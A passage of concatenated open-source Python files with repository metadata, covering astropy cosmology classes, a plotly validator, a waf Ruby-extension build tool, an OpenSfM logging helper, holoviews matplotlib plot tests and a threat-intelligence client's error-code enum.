# if `other` cannot be converted to a Cosmology, rather than
# raising an Exception.
return False
def __equiv__(self, other: Any, /) -> bool:
"""Cosmology equivalence. Use ``.is_equivalent()`` for actual check!
Parameters
----------
other : `~astropy.cosmology.Cosmology` subclass instance, positional-only
The object in which to compare.
Returns
-------
bool or `NotImplemented`
`NotImplemented` if ``other`` is from a different class.
`True` if ``other`` is of the same class and has matching parameters
and parameter values.
`False` otherwise.
"""
if other.__class__ is not self.__class__:
return NotImplemented # allows other.__equiv__
# Check all parameters in 'other' match those in 'self' and 'other' has
# no extra parameters (latter part should never happen b/c same class)
return set(self.__all_parameters__) == set(other.__all_parameters__) and all(
np.all(getattr(self, k) == getattr(other, k))
for k in self.__all_parameters__
)
def __eq__(self, other: Any, /) -> bool:
"""Check equality between Cosmologies.
Checks the Parameters and immutable fields (i.e. not "meta").
Parameters
----------
other : `~astropy.cosmology.Cosmology` subclass instance, positional-only
The object in which to compare.
Returns
-------
bool
`True` if Parameters and names are the same, `False` otherwise.
"""
if other.__class__ is not self.__class__:
return NotImplemented # allows other.__eq__
eq = (
# non-Parameter checks: name
self.name == other.name
# check all parameters in 'other' match those in 'self' and 'other'
# has no extra parameters (latter part should never happen b/c same
# class) TODO! element-wise when there are array cosmologies
and set(self.__all_parameters__) == set(other.__all_parameters__)
and all(
np.all(getattr(self, k) == getattr(other, k))
for k in self.__all_parameters__
)
)
return eq
# ---------------------------------------------------------------
def __repr__(self):
namelead = f"{self.__class__.__qualname__}("
if self.name is not None:
namelead += f'name="{self.name}", '
# nicely formatted parameters
fmtps = (f"{k}={getattr(self, k)}" for k in self.__parameters__)
return namelead + ", ".join(fmtps) + ")"
def __astropy_table__(self, cls, copy, **kwargs):
"""Return a `~astropy.table.Table` of type ``cls``.
Parameters
----------
cls : type
Astropy ``Table`` class or subclass.
copy : bool
Ignored.
**kwargs : dict, optional
Additional keyword arguments. Passed to ``self.to_format()``.
See ``Cosmology.to_format.help("astropy.table")`` for allowed kwargs.
Returns
-------
`astropy.table.Table` or subclass instance
Instance of type ``cls``.
"""
return self.to_format("astropy.table", cls=cls, **kwargs)
class FlatCosmologyMixin(metaclass=abc.ABCMeta):
"""
Mixin class for flat cosmologies. Do NOT instantiate directly.
Note that all instances of ``FlatCosmologyMixin`` are flat, but not all
    flat cosmologies are instances of ``FlatCosmologyMixin``. For example,
    ``LambdaCDM`` **may** be flat (for a specific set of parameter values),
but ``FlatLambdaCDM`` **will** be flat.
"""
__all_parameters__: tuple[str, ...]
__parameters__: tuple[str, ...]
def __init_subclass__(cls: type[_FlatCosmoT]) -> None:
super().__init_subclass__()
# Determine the non-flat class.
# This will raise a TypeError if the MRO is inconsistent.
cls.__nonflatclass__
# ===============================================================
@classmethod # TODO! make metaclass-method
def _get_nonflat_cls(
cls, kls: type[_CosmoT] | None = None
) -> type[Cosmology] | None:
"""Find the corresponding non-flat class.
The class' bases are searched recursively.
Parameters
----------
kls : :class:`astropy.cosmology.Cosmology` class or None, optional
If `None` (default) this class is searched instead of `kls`.
Raises
------
TypeError
If more than one non-flat class is found at the same level of the
inheritance. This is similar to the error normally raised by Python
for an inconsistent method resolution order.
Returns
-------
type
A :class:`Cosmology` subclass this class inherits from that is not a
:class:`FlatCosmologyMixin` subclass.
"""
_kls = cls if kls is None else kls
# Find non-flat classes
nonflat: set[type[Cosmology]]
nonflat = {
b
for b in _kls.__bases__
if issubclass(b, Cosmology) and not issubclass(b, FlatCosmologyMixin)
}
if not nonflat: # e.g. subclassing FlatLambdaCDM
nonflat = {
k for b in _kls.__bases__ if (k := cls._get_nonflat_cls(b)) is not None
}
if len(nonflat) > 1:
raise TypeError(
"cannot create a consistent non-flat class resolution order "
f"for {_kls} with bases {nonflat} at the same inheritance level."
)
if not nonflat: # e.g. FlatFLRWMixin(FlatCosmologyMixin)
return None
return nonflat.pop()
__nonflatclass__ = classproperty(
_get_nonflat_cls, lazy=True, doc="Return the corresponding non-flat class."
)
# ===============================================================
@property
def is_flat(self):
"""Return `True`, the cosmology is flat."""
return True
@abc.abstractmethod
def nonflat(self: _FlatCosmoT) -> _CosmoT:
"""Return the equivalent non-flat-class instance of this cosmology."""
def clone(self, *, meta: Mapping | None = None, to_nonflat: bool = False, **kwargs):
"""Returns a copy of this object with updated parameters, as specified.
This cannot be used to change the type of the cosmology, except for
changing to the non-flat version of this cosmology.
Parameters
----------
meta : mapping or None (optional, keyword-only)
Metadata that will update the current metadata.
to_nonflat : bool, optional keyword-only
Whether to change to the non-flat version of this cosmology.
**kwargs
Cosmology parameter (and name) modifications. If any parameter is
changed and a new name is not given, the name will be set to "[old
name] (modified)".
Returns
-------
newcosmo : `~astropy.cosmology.Cosmology` subclass instance
A new instance of this class with updated parameters as specified.
If no arguments are given, then a reference to this object is
returned instead of copy.
Examples
--------
To make a copy of the ``Planck13`` cosmology with a different matter
density (``Om0``), and a new name:
>>> from astropy.cosmology import Planck13
>>> Planck13.clone(name="Modified Planck 2013", Om0=0.35)
FlatLambdaCDM(name="Modified Planck 2013", H0=67.77 km / (Mpc s),
Om0=0.35, ...
If no name is specified, the new name will note the modification.
>>> Planck13.clone(Om0=0.35).name
'Planck13 (modified)'
The keyword 'to_nonflat' can be used to clone on the non-flat equivalent
cosmology.
>>> Planck13.clone(to_nonflat=True)
LambdaCDM(name="Planck13", ...
>>> Planck13.clone(H0=70, to_nonflat=True)
LambdaCDM(name="Planck13 (modified)", H0=70.0 km / (Mpc s), ...
"""
if to_nonflat:
return self.nonflat.clone(meta=meta, **kwargs)
return super().clone(meta=meta, **kwargs)
# ===============================================================
def __equiv__(self, other):
"""flat-|Cosmology| equivalence.
Use `astropy.cosmology.funcs.cosmology_equal` with
``allow_equivalent=True`` for actual checks!
Parameters
----------
other : `~astropy.cosmology.Cosmology` subclass instance
The object to which to compare for equivalence.
Returns
-------
bool or `NotImplemented`
`True` if ``other`` is of the same class / non-flat class (e.g.
|FlatLambdaCDM| and |LambdaCDM|) has matching parameters and
parameter values.
`False` if ``other`` is of the same class but has different
parameters.
`NotImplemented` otherwise.
"""
if isinstance(other, FlatCosmologyMixin):
return super().__equiv__(other) # super gets from Cosmology
        # Check if `other` is the non-flat version of this class. This makes
        # the assumption that any further subclass of a flat cosmology keeps
        # the same physics.
if not issubclass(other.__class__, self.__nonflatclass__):
return NotImplemented
        # Check that the parameters are equivalent: all parameters in `other`
        # match those in `self`, and `other` has no extra parameters.
params_eq = (
set(self.__all_parameters__) == set(other.__all_parameters__) # no extra
# equal
and all(
np.all(getattr(self, k) == getattr(other, k))
for k in self.__parameters__
)
# flatness check
and other.is_flat
)
return params_eq
# -----------------------------------------------------------------------------
def __getattr__(attr):
from . import flrw
if hasattr(flrw, attr) and attr not in ("__path__",):
import warnings
from astropy.utils.exceptions import AstropyDeprecationWarning
warnings.warn(
f"`astropy.cosmology.core.{attr}` has been moved (since v5.0) and "
f"should be imported as ``from astropy.cosmology import {attr}``."
" In future this will raise an exception.",
AstropyDeprecationWarning,
)
return getattr(flrw, attr)
raise AttributeError(f"module {__name__!r} has no attribute {attr!r}.")
| {
"content_hash": "829957447cac7503037c0210d9efc8f4",
"timestamp": "",
"source": "github",
"line_count": 610,
"max_line_length": 88,
"avg_line_length": 36.15573770491803,
"alnum_prop": 0.5745635910224439,
"repo_name": "pllim/astropy",
"id": "6de217588c67b1124418f1fb4ff64605975389e1",
"size": "22120",
"binary": false,
"copies": "3",
"ref": "refs/heads/placeholder",
"path": "astropy/cosmology/core.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "11040101"
},
{
"name": "C++",
"bytes": "47001"
},
{
"name": "Cython",
"bytes": "78776"
},
{
"name": "HTML",
"bytes": "1172"
},
{
"name": "Lex",
"bytes": "183333"
},
{
"name": "M4",
"bytes": "18757"
},
{
"name": "Makefile",
"bytes": "52508"
},
{
"name": "Python",
"bytes": "12404182"
},
{
"name": "Shell",
"bytes": "17024"
},
{
"name": "TeX",
"bytes": "853"
}
],
"symlink_target": ""
} |
import _plotly_utils.basevalidators
class FamilysrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="familysrc", parent_name="scattergl.hoverlabel.font", **kwargs
):
super(FamilysrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
| {
"content_hash": "4030a8ee09fd98da66a7c9ccddea1e0a",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 88,
"avg_line_length": 34,
"alnum_prop": 0.6029411764705882,
"repo_name": "plotly/python-api",
"id": "7bf4315987dc3f4723f006b407d4e41210adfdfd",
"size": "476",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/scattergl/hoverlabel/font/_familysrc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "6870"
},
{
"name": "Makefile",
"bytes": "1708"
},
{
"name": "Python",
"bytes": "823245"
},
{
"name": "Shell",
"bytes": "3238"
}
],
"symlink_target": ""
} |
"""
Support for Ruby extensions. A C/C++ compiler is required::
def options(opt):
opt.load('compiler_c ruby')
def configure(conf):
conf.load('compiler_c ruby')
conf.check_ruby_version((1,8,0))
conf.check_ruby_ext_devel()
conf.check_ruby_module('libxml')
def build(bld):
bld(
features = 'c cshlib rubyext',
source = 'rb_mytest.c',
target = 'mytest_ext',
install_path = '${ARCHDIR_RUBY}')
bld.install_files('${LIBDIR_RUBY}', 'Mytest.rb')
"""
import os
from waflib import Errors, Options, Task, Utils
from waflib.TaskGen import before_method, feature, extension
from waflib.Configure import conf
@feature('rubyext')
@before_method('apply_incpaths', 'process_source', 'apply_bundle', 'apply_link')
def init_rubyext(self):
"""
Add required variables for ruby extensions
"""
self.install_path = '${ARCHDIR_RUBY}'
self.uselib = self.to_list(getattr(self, 'uselib', ''))
if not 'RUBY' in self.uselib:
self.uselib.append('RUBY')
if not 'RUBYEXT' in self.uselib:
self.uselib.append('RUBYEXT')
@feature('rubyext')
@before_method('apply_link', 'propagate_uselib_vars')
def apply_ruby_so_name(self):
"""
Strip the *lib* prefix from ruby extensions
"""
self.env.cshlib_PATTERN = self.env.cxxshlib_PATTERN = self.env.rubyext_PATTERN
@conf
def check_ruby_version(self, minver=()):
"""
Checks if ruby is installed.
	If installed, the variable RUBY will be set in the environment.
	The ruby binary can be overridden by the ``--with-ruby-binary`` command-line option.
"""
ruby = self.find_program('ruby', var='RUBY', value=Options.options.rubybinary)
try:
version = self.cmd_and_log(ruby + ['-e', 'puts defined?(VERSION) ? VERSION : RUBY_VERSION']).strip()
except Errors.WafError:
self.fatal('could not determine ruby version')
self.env.RUBY_VERSION = version
try:
ver = tuple(map(int, version.split('.')))
	except (ValueError, Errors.WafError):
self.fatal('unsupported ruby version %r' % version)
cver = ''
if minver:
cver = '> ' + '.'.join(str(x) for x in minver)
if ver < minver:
self.fatal('ruby is too old %r' % ver)
self.msg('Checking for ruby version %s' % cver, version)
@conf
def check_ruby_ext_devel(self):
"""
Check if a ruby extension can be created
"""
if not self.env.RUBY:
self.fatal('ruby detection is required first')
if not self.env.CC_NAME and not self.env.CXX_NAME:
self.fatal('load a c/c++ compiler first')
version = tuple(map(int, self.env.RUBY_VERSION.split(".")))
def read_out(cmd):
return Utils.to_list(self.cmd_and_log(self.env.RUBY + ['-rrbconfig', '-e', cmd]))
def read_config(key):
return read_out('puts RbConfig::CONFIG[%r]' % key)
cpppath = archdir = read_config('archdir')
if version >= (1, 9, 0):
ruby_hdrdir = read_config('rubyhdrdir')
cpppath += ruby_hdrdir
if version >= (2, 0, 0):
cpppath += read_config('rubyarchhdrdir')
cpppath += [os.path.join(ruby_hdrdir[0], read_config('arch')[0])]
self.check(header_name='ruby.h', includes=cpppath, errmsg='could not find ruby header file', link_header_test=False)
self.env.LIBPATH_RUBYEXT = read_config('libdir')
self.env.LIBPATH_RUBYEXT += archdir
self.env.INCLUDES_RUBYEXT = cpppath
self.env.CFLAGS_RUBYEXT = read_config('CCDLFLAGS')
self.env.rubyext_PATTERN = '%s.' + read_config('DLEXT')[0]
# ok this is really stupid, but the command and flags are combined.
# so we try to find the first argument...
flags = read_config('LDSHARED')
while flags and flags[0][0] != '-':
flags = flags[1:]
# we also want to strip out the deprecated ppc flags
if len(flags) > 1 and flags[1] == "ppc":
flags = flags[2:]
self.env.LINKFLAGS_RUBYEXT = flags
self.env.LINKFLAGS_RUBYEXT += read_config('LIBS')
self.env.LINKFLAGS_RUBYEXT += read_config('LIBRUBYARG_SHARED')
if Options.options.rubyarchdir:
self.env.ARCHDIR_RUBY = Options.options.rubyarchdir
else:
self.env.ARCHDIR_RUBY = read_config('sitearchdir')[0]
if Options.options.rubylibdir:
self.env.LIBDIR_RUBY = Options.options.rubylibdir
else:
self.env.LIBDIR_RUBY = read_config('sitelibdir')[0]
@conf
def check_ruby_module(self, module_name):
"""
Check if the selected ruby interpreter can require the given ruby module::
def configure(conf):
conf.check_ruby_module('libxml')
:param module_name: module
:type module_name: string
"""
self.start_msg('Ruby module %s' % module_name)
try:
self.cmd_and_log(self.env.RUBY + ['-e', 'require \'%s\';puts 1' % module_name])
except Errors.WafError:
self.end_msg(False)
self.fatal('Could not find the ruby module %r' % module_name)
self.end_msg(True)
@extension('.rb')
def process(self, node):
return self.create_task('run_ruby', node)
class run_ruby(Task.Task):
"""
Task to run ruby files detected by file extension .rb::
def options(opt):
opt.load('ruby')
def configure(ctx):
ctx.check_ruby_version()
def build(bld):
bld.env.RBFLAGS = '-e puts "hello world"'
bld(source='a_ruby_file.rb')
"""
run_str = '${RUBY} ${RBFLAGS} -I ${SRC[0].parent.abspath()} ${SRC}'
def options(opt):
"""
Add the ``--with-ruby-archdir``, ``--with-ruby-libdir`` and ``--with-ruby-binary`` options
"""
opt.add_option('--with-ruby-archdir', type='string', dest='rubyarchdir', help='Specify directory where to install arch specific files')
opt.add_option('--with-ruby-libdir', type='string', dest='rubylibdir', help='Specify alternate ruby library path')
opt.add_option('--with-ruby-binary', type='string', dest='rubybinary', help='Specify alternate ruby binary')
| {
"content_hash": "765c198091b5689ae52ef0b85684c2eb",
"timestamp": "",
"source": "github",
"line_count": 181,
"max_line_length": 136,
"avg_line_length": 30.204419889502763,
"alnum_prop": 0.6873971099323212,
"repo_name": "MarekIgnaszak/econ-project-templates",
"id": "8d92a79a16179d3b62d957135b0d73c34e35710d",
"size": "5579",
"binary": false,
"copies": "49",
"ref": "refs/heads/python",
"path": ".mywaflib/waflib/Tools/ruby.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "663"
},
{
"name": "Jupyter Notebook",
"bytes": "3572"
},
{
"name": "Python",
"bytes": "1222989"
},
{
"name": "Shell",
"bytes": "1716"
},
{
"name": "TeX",
"bytes": "14224"
}
],
"symlink_target": ""
} |
import numpy as np
from holoviews.core.spaces import DynamicMap
from holoviews.element import Image, Curve, Scatter, Scatter3D
from holoviews.streams import Stream
from .test_plot import TestMPLPlot, mpl_renderer
try:
from matplotlib.ticker import FormatStrFormatter, FuncFormatter, PercentFormatter
except ImportError:
pass
class TestElementPlot(TestMPLPlot):
def test_stream_cleanup(self):
stream = Stream.define(str('Test'), test=1)()
dmap = DynamicMap(lambda test: Curve([]), streams=[stream])
plot = mpl_renderer.get_plot(dmap)
self.assertTrue(bool(stream._subscribers))
plot.cleanup()
self.assertFalse(bool(stream._subscribers))
def test_element_hooks(self):
def hook(plot, element):
plot.handles['title'].set_text('Called')
curve = Curve(range(10), label='Not Called').opts(hooks=[hook])
plot = mpl_renderer.get_plot(curve)
self.assertEqual(plot.handles['title'].get_text(), 'Called')
def test_element_font_scaling(self):
curve = Curve(range(10)).options(fontscale=2, title='A title')
plot = mpl_renderer.get_plot(curve)
ax = plot.handles['axis']
self.assertEqual(ax.title.get_fontsize(), 24)
self.assertEqual(ax.xaxis.label.get_fontsize(), 20)
self.assertEqual(ax.yaxis.label.get_fontsize(), 20)
self.assertEqual(ax.xaxis._major_tick_kw['labelsize'], 20)
self.assertEqual(ax.yaxis._major_tick_kw['labelsize'], 20)
def test_element_font_scaling_fontsize_override_common(self):
curve = Curve(range(10)).options(fontscale=2, fontsize=14, title='A title')
plot = mpl_renderer.get_plot(curve)
ax = plot.handles['axis']
self.assertEqual(ax.title.get_fontsize(), 28)
self.assertEqual(ax.xaxis.label.get_fontsize(), 28)
self.assertEqual(ax.yaxis.label.get_fontsize(), 28)
self.assertEqual(ax.xaxis._major_tick_kw['labelsize'], 20)
self.assertEqual(ax.yaxis._major_tick_kw['labelsize'], 20)
def test_element_font_scaling_fontsize_override_specific(self):
curve = Curve(range(10)).options(
fontscale=2, fontsize={'title': 16, 'xticks': 12, 'xlabel': 6}, title='A title')
plot = mpl_renderer.get_plot(curve)
ax = plot.handles['axis']
self.assertEqual(ax.title.get_fontsize(), 32)
self.assertEqual(ax.xaxis.label.get_fontsize(), 12)
self.assertEqual(ax.yaxis.label.get_fontsize(), 20)
self.assertEqual(ax.xaxis._major_tick_kw['labelsize'], 24)
self.assertEqual(ax.yaxis._major_tick_kw['labelsize'], 20)
def test_element_xlabel(self):
element = Curve(range(10)).options(xlabel='custom x-label')
axes = mpl_renderer.get_plot(element).handles['axis']
self.assertEqual(axes.get_xlabel(), 'custom x-label')
def test_element_ylabel(self):
element = Curve(range(10)).options(ylabel='custom y-label')
axes = mpl_renderer.get_plot(element).handles['axis']
self.assertEqual(axes.get_ylabel(), 'custom y-label')
def test_element_xformatter_string(self):
curve = Curve(range(10)).options(xformatter='%d')
plot = mpl_renderer.get_plot(curve)
xaxis = plot.handles['axis'].xaxis
xformatter = xaxis.get_major_formatter()
self.assertIsInstance(xformatter, FormatStrFormatter)
self.assertEqual(xformatter.fmt, '%d')
def test_element_yformatter_string(self):
curve = Curve(range(10)).options(yformatter='%d')
plot = mpl_renderer.get_plot(curve)
yaxis = plot.handles['axis'].yaxis
yformatter = yaxis.get_major_formatter()
self.assertIsInstance(yformatter, FormatStrFormatter)
self.assertEqual(yformatter.fmt, '%d')
def test_element_zformatter_string(self):
curve = Scatter3D([]).options(zformatter='%d')
plot = mpl_renderer.get_plot(curve)
zaxis = plot.handles['axis'].zaxis
zformatter = zaxis.get_major_formatter()
self.assertIsInstance(zformatter, FormatStrFormatter)
self.assertEqual(zformatter.fmt, '%d')
def test_element_xformatter_function(self):
def formatter(value):
return str(value) + ' %'
curve = Curve(range(10)).options(xformatter=formatter)
plot = mpl_renderer.get_plot(curve)
xaxis = plot.handles['axis'].xaxis
xformatter = xaxis.get_major_formatter()
self.assertIsInstance(xformatter, FuncFormatter)
def test_element_yformatter_function(self):
def formatter(value):
return str(value) + ' %'
curve = Curve(range(10)).options(yformatter=formatter)
plot = mpl_renderer.get_plot(curve)
yaxis = plot.handles['axis'].yaxis
yformatter = yaxis.get_major_formatter()
self.assertIsInstance(yformatter, FuncFormatter)
def test_element_zformatter_function(self):
def formatter(value):
return str(value) + ' %'
curve = Scatter3D([]).options(zformatter=formatter)
plot = mpl_renderer.get_plot(curve)
zaxis = plot.handles['axis'].zaxis
zformatter = zaxis.get_major_formatter()
self.assertIsInstance(zformatter, FuncFormatter)
def test_element_xformatter_instance(self):
formatter = PercentFormatter()
curve = Curve(range(10)).options(xformatter=formatter)
plot = mpl_renderer.get_plot(curve)
xaxis = plot.handles['axis'].xaxis
xformatter = xaxis.get_major_formatter()
self.assertIs(xformatter, formatter)
def test_element_yformatter_instance(self):
formatter = PercentFormatter()
curve = Curve(range(10)).options(yformatter=formatter)
plot = mpl_renderer.get_plot(curve)
yaxis = plot.handles['axis'].yaxis
yformatter = yaxis.get_major_formatter()
self.assertIs(yformatter, formatter)
def test_element_zformatter_instance(self):
formatter = PercentFormatter()
curve = Scatter3D([]).options(zformatter=formatter)
plot = mpl_renderer.get_plot(curve)
zaxis = plot.handles['axis'].zaxis
zformatter = zaxis.get_major_formatter()
self.assertIs(zformatter, formatter)
class TestColorbarPlot(TestMPLPlot):
def test_colormapper_unsigned_int(self):
img = Image(np.array([[1, 1, 1, 2], [2, 2, 3, 4]]).astype('uint16'))
plot = mpl_renderer.get_plot(img)
artist = plot.handles['artist']
self.assertEqual(artist.get_clim(), (1, 4))
def test_colormapper_symmetric(self):
img = Image(np.array([[0, 1], [2, 3]])).options(symmetric=True)
plot = mpl_renderer.get_plot(img)
artist = plot.handles['artist']
self.assertEqual(artist.get_clim(), (-3, 3))
def test_colormapper_clims(self):
img = Image(np.array([[0, 1], [2, 3]])).options(clims=(0, 4))
plot = mpl_renderer.get_plot(img)
artist = plot.handles['artist']
self.assertEqual(artist.get_clim(), (0, 4))
def test_colormapper_color_levels(self):
img = Image(np.array([[0, 1], [2, 3]])).options(color_levels=5)
plot = mpl_renderer.get_plot(img)
artist = plot.handles['artist']
self.assertEqual(len(artist.cmap.colors), 5)
def test_colormapper_transparent_nan(self):
img = Image(np.array([[0, 1], [2, 3]])).options(clipping_colors={'NaN': 'transparent'})
plot = mpl_renderer.get_plot(img)
cmap = plot.handles['artist'].cmap
self.assertEqual(cmap._rgba_bad, (1.0, 1.0, 1.0, 0))
def test_colormapper_min_max_colors(self):
img = Image(np.array([[0, 1], [2, 3]])).options(clipping_colors={'min': 'red', 'max': 'blue'})
plot = mpl_renderer.get_plot(img)
cmap = plot.handles['artist'].cmap
self.assertEqual(cmap._rgba_under, (1.0, 0, 0, 1))
self.assertEqual(cmap._rgba_over, (0, 0, 1.0, 1))
def test_colorbar_label(self):
scatter = Scatter(np.random.rand(100, 3), vdims=["y", "color"]).options(color_index=2, colorbar=True)
plot = mpl_renderer.get_plot(scatter)
cbar_ax = plot.handles['cax']
self.assertEqual(cbar_ax.get_ylabel(), 'color')
def test_colorbar_empty_clabel(self):
img = Image(np.array([[1, 1, 1, 2], [2, 2, 3, 4]])).opts(clabel='', colorbar=True)
plot = mpl_renderer.get_plot(img)
colorbar = plot.handles['cax']
self.assertEqual(colorbar.get_label(), '')
def test_colorbar_label_style_mapping(self):
scatter = Scatter(np.random.rand(100, 3), vdims=["y", "color"]).options(color='color', colorbar=True)
plot = mpl_renderer.get_plot(scatter)
cbar_ax = plot.handles['cax']
self.assertEqual(cbar_ax.get_ylabel(), 'color')
class TestOverlayPlot(TestMPLPlot):
def test_overlay_legend_opts(self):
overlay = (
Curve(np.random.randn(10).cumsum(), label='A') *
Curve(np.random.randn(10).cumsum(), label='B')
).options(legend_opts={'framealpha': 0.5, 'facecolor': 'red'})
plot = mpl_renderer.get_plot(overlay)
legend_frame = plot.handles['legend'].get_frame()
self.assertEqual(legend_frame.get_alpha(), 0.5)
self.assertEqual(legend_frame.get_facecolor(), (1.0, 0.0, 0.0, 0.5))
| {
"content_hash": "fdadbcee364c93f6ccfb20a8d00bff3a",
"timestamp": "",
"source": "github",
"line_count": 217,
"max_line_length": 109,
"avg_line_length": 42.83410138248848,
"alnum_prop": 0.635933297471759,
"repo_name": "ioam/holoviews",
"id": "de06cbc2a9fb9e93acd1abb5ce55f1b5d1c06ce7",
"size": "9295",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "holoviews/tests/plotting/matplotlib/test_elementplot.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "1546"
},
{
"name": "HTML",
"bytes": "18997"
},
{
"name": "JavaScript",
"bytes": "20747"
},
{
"name": "Jupyter Notebook",
"bytes": "1379"
},
{
"name": "Python",
"bytes": "3241652"
}
],
"symlink_target": ""
} |
import logging
import os
from typing import Optional
def setup() -> None:
logging.basicConfig(
format="%(asctime)s %(levelname)s: %(message)s", level=logging.DEBUG
)
def memory_available() -> Optional[int]:
"""Available memory in MB.
Only works on linux and returns None otherwise.
"""
lines = os.popen("free -t -m").readlines()
if not lines:
return None
available_mem = int(lines[1].split()[6])
return available_mem
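# Editor-added usage sketch, not part of the original module: shows how setup()
# and memory_available() are meant to be combined. The helper name below is
# hypothetical.
def _log_available_memory_sketch() -> None:
    setup()  # DEBUG-level logging with timestamps
    mem = memory_available()
    if mem is None:
        logging.debug("memory_available() is unsupported on this platform")
    else:
        logging.debug("Available memory: %d MB", mem)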
| {
"content_hash": "d5360d98f5a6ec38d7af9bbfbdcbb18c",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 76,
"avg_line_length": 22.571428571428573,
"alnum_prop": 0.6392405063291139,
"repo_name": "mapillary/OpenSfM",
"id": "379a3a53be4f4294b97508a93bf439bd71c008e0",
"size": "474",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "opensfm/log.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "396"
},
{
"name": "C++",
"bytes": "648986"
},
{
"name": "CMake",
"bytes": "78367"
},
{
"name": "CSS",
"bytes": "6426"
},
{
"name": "Dockerfile",
"bytes": "642"
},
{
"name": "HTML",
"bytes": "63144"
},
{
"name": "JavaScript",
"bytes": "1054984"
},
{
"name": "Python",
"bytes": "1141169"
},
{
"name": "Shell",
"bytes": "4006"
}
],
"symlink_target": ""
} |
from enum import Enum
class ErrorCodes(Enum):
""" """
#
# NOTE: Testing to see if Enums as error codes is usable.
#
e0100 = 'Settings Error: ({0!s}).'
    e0110 = 'Settings Error: ({0!s}) is an invalid value. API Request Timeout must be an integer.'
    e0120 = 'Settings Error: ({0!s}) is an invalid value. API Retries must be an integer.'
    e0130 = 'Settings Error: ({0!s}) is an invalid value. API Sleep must be an integer.'
    e0140 = 'Settings Error: ({0!s}) is an invalid value. Max result counts must be an integer.'
#
# Resource Error Codes
#
e0500 = 'Resource Error: ({0!s}) is an invalid resource type. Resource types must be a ResourceKey enum.'
#
# Filter Error Codes
#
e1000 = 'Filter Error: ({0!s}) is an invalid filter operator. Filter Operators must be a FilterSetOperator Enum.'
e1010 = 'Filter Error: ({0!s}) is an invalid filter operator. Filter Operators must be a FilterOperator Enum.'
# group filters
e4000 = 'Filter Error: ({0!s}) is an invalid adversary ID. The adversary ID must be an integer.'
e4010 = 'Filter Error: ({0!s}) is an invalid document ID. The document ID must be an integer.'
e4020 = 'Filter Error: ({0!s}) is an invalid email ID. The email ID must be an integer.'
e4030 = 'Filter Error: ({0!s}) is an invalid ID. The ID must be an integer.'
e4040 = 'Filter Error: ({0!s}) is an invalid incident ID. The incident ID must be an integer.'
e4050 = 'Filter Error: ({0!s}) is an invalid Security Label. The Security Label must be a string.'
e4060 = 'Filter Error: ({0!s}) is an invalid signature ID. The signature ID must be an integer.'
e4070 = 'Filter Error: ({0!s}) is an invalid Tag. The Tag must be a string.'
e4080 = 'Filter Error: ({0!s}) is an invalid threat ID. The threat ID must be an integer.'
e4090 = 'Filter Error: ({0!s}) is an invalid victim ID. The victim ID must be an integer.'
# indicator filters
e5000 = 'Filter Error: ({0!s}) is an invalid Group ID. The Group ID must be an integer.'
e5001 = 'Filter Error: ({0!s}) is an invalid Group Type. The Group Type must be a GroupType Enum.'
e5010 = 'Filter Error: ({0!s}) is an invalid indicator.'
    e5011 = 'Filter Error: ({0!s}) is an invalid indicator type. The Indicator Type must be a GroupType Enum.'
e5020 = 'Filter Error: ({0!s}) is an invalid Victim ID. The Victim ID must be an integer.'
e5100 = 'Filter Error: Only one type can be added to a filter. The current filter type is ({0!s}).'
# Request Object
e6000 = 'Request Object Error: {0!s} is not a valid HTTP method.'
#
# Resource Object Error Codes
#
e10000 = 'Resource Error: {0!s}'
e10010 = 'Resource Error: Confidence must be >= 0 and <=100. ({0!s}) is not in this range.'
e10011 = 'Resource Error: Confidence must be of integer type. ({0!s}) is not an integer value.'
e10012 = 'Resource Error: ({0!s}) was not found in id index.'
e10013 = 'Resource Error: ({0!s}) was not found in name index.'
e10020 = 'Resource Error: ID must be of integer type. ({0!s}) is not an integer value.'
e10030 = 'Resource Error: Resource Type is not configured for this object.'
e10040 = 'Resource Error: Cannot commit incomplete resource object.'
e10050 = 'Resource Error: {0!s} is an invalid indicator.'
# Indicator Resource Object
e10100 = 'Resource Error: DNS Active is not supported for this resource type.'
e10110 = 'Resource Error: DNS Resolutions is not supported for this resource type.'
e10120 = 'Resource Error: File Occurrences is not supported for this resource type.'
e10130 = 'Resource Error: Size is not supported for this resource type.'
e10140 = 'Resource Error: WhoIs Active is not supported for this resource type.'
e10150 = 'Resource Error: File Occurrences is not supported for this resource type.'
# Group Resource Object
e10200 = 'Resource Error: Body is not supported for this resource type.'
e10210 = 'Resource Error: Contents is not supported for this resource type.'
e10220 = 'Resource Error: Event Date is not supported for this resource type.'
e10230 = 'Resource Error: File Name is not supported for this resource type.'
e10240 = 'Resource Error: File Size is not supported for this resource type.'
e10250 = 'Resource Error: File Text is not supported for this resource type.'
e10260 = 'Resource Error: File Type is not supported for this resource type.'
e10270 = 'Resource Error: From is not supported for this resource type.'
e10280 = 'Resource Error: Header is not supported for this resource type.'
e10290 = 'Resource Error: Score is not supported for this resource type.'
e10300 = 'Resource Error: Subject is not supported for this resource type.'
e10310 = 'Resource Error: To is not supported for this resource type.'
e10320 = 'Resource Error: Download is not supported for this resource type.'
e10330 = 'Resource Error: Upload is not supported for this resource type.'
# Victim Resource Object
e10500 = 'Resource Error: Account is not supported for this resource type.'
e10510 = 'Resource Error: Address is not supported for this resource type.'
e10520 = 'Resource Error: Address Type is not supported for this resource type.'
e10530 = 'Resource Error: Network is not supported for this resource type.'
e10540 = 'Resource Error: Phone Type is not supported for this resource type.'
e10550 = 'Resource Error: ({0!s}) is an Invalid Victim Asset Type.'
e10560 = 'Resource Error: Website is not supported for this resource type.'
#
# API Errors
#
e80000 = 'API Error: {0!s}'
#
# Runtime Errors
#
